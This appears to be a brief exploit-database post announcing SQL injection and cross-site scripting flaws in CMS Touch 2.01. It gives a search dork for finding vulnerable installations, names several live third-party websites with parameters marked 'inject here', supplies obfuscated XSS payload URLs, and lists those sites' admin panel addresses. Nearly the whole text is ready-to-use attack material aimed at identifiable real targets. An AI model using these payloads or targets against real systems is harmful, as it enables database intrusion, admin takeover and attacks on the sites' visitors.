CMS Touch version 2.01 suffers from remote SQL injection and cross site scripting vulnerabilities. Note that this finding houses site-specific data.
c655b6f45eb784269e8b7fa2be84b760ebc6980d5e6c56eeba90e163b5294d09
cms touch V2.01 Sql Vulnerability
=================================
Author : indoushka
vendor : http://cmstouch.com
=================================
# Dork : powered by cmstouch
نظام تاتش لإدارة المواقع الإلكترونية النسخة 2.01
http://alfarrajsite.com/cmstouch/pages.php?Page_ID=28 (inject here)
http://www.islamiccenter1.com/cmstouch/news.php?do=show&News_ID=18 (inject here)
http://www.ts.net.sa/cmstouch/news.php?do=show&News_ID=18 (inject here)
xss :
/cmstouch/news.php?do=show&News_ID=18'%22()%26%25<ScRiPt%20>prompt(771818860)</ScRiPt>
/cmstouch/products.php?do=show&Products_ID=5'%22()%26%25<ScRiPt%20>prompt(771818860)</ScRiPt>
Panel :
http://www.ts.net.sa/cmstouch//touchPanel/
http://cmstouch.com/touchPanel/
http://islamiccenter1.com/cmstouch/touchPanel/